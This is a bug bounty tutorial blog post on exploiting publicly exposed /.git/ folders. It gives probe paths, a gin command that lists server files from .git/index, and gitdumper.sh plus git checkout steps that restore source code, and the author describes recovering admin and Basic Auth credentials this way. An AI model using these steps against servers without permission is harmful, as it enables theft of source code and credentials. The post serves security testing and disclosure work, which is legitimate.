Git Folder: Bug Bounty Tips

Bug Hunter found that /.git/ folder is public

Hello everyone! In this article i want show to you how exploit open /.git/ folder. Some of my report was marked as Dublicate and the researchers were unable to prove harm, which is why the reports was closed as Informative.But after my comments state of reports was changed from Informative to Low.

Discovery

How we can found open git folder? This endpoint will help you:

/.git/
/.git/index
/.git/logs/
/.git/HEAD
/.git/logs/HEAD
/.git/logs/refs

If all this endpoints response to you with 200 OK response code than target is vulnerable.

P.S. actually even if you only can get access only to /.git/index you still can exploit this!

Low impact

It will be most common scenario in your practice. In /.git/index file you can found list of all files that present on a target server (so, if you found index file open than your content discovery is almost ready).

To extract list of all endpoint we will be use Gin tool. Just download index file with, for example, wget tool and execute following command:

./gin <path-to-index-file>| grep “name = “

And… boom. List of all endpoints on your terminal screen:

Result of gin tool

From this stage you can already report this (exception: you receive only list of html, css, js files… there no impact in this case). But do not hurry!

Medium/High impact

Impact depend on which endpoints will you can get access on a target. Case from my practice: i successfully receive access to one .php file that disclosure to me list of all domains and subdomains of target that give to me 8 Subdomains Takeover, PHP Code Injection and SQL Injection on a different resources of a company.

For high impact you can find api keys, tokens, users data etc. So it only depend what you can achive from list of files that you receive from gin tool.

Critical impact

In this case you need to restore files from git folder and get access to source code. It often work with Wordpress or other CMS because you can restore configuration files that have database credentials, salt keys and other critical information or you can find vulnerability in source code. My favorite tool for this is GitTools. For restoring we must navigate into Dumper folder and execute following command:

bash gitdumper.sh https://<address-here.com>/.git/ <output-folder>

Than navigate into output folder and execute:

1. git status
2. git checkout — .

After that just print source code of files to your terminal (note that not all files will be restored).

Case: i successfully restore some files where i was able to find credentials for Basic Auth and admin credentials for login form!

That all!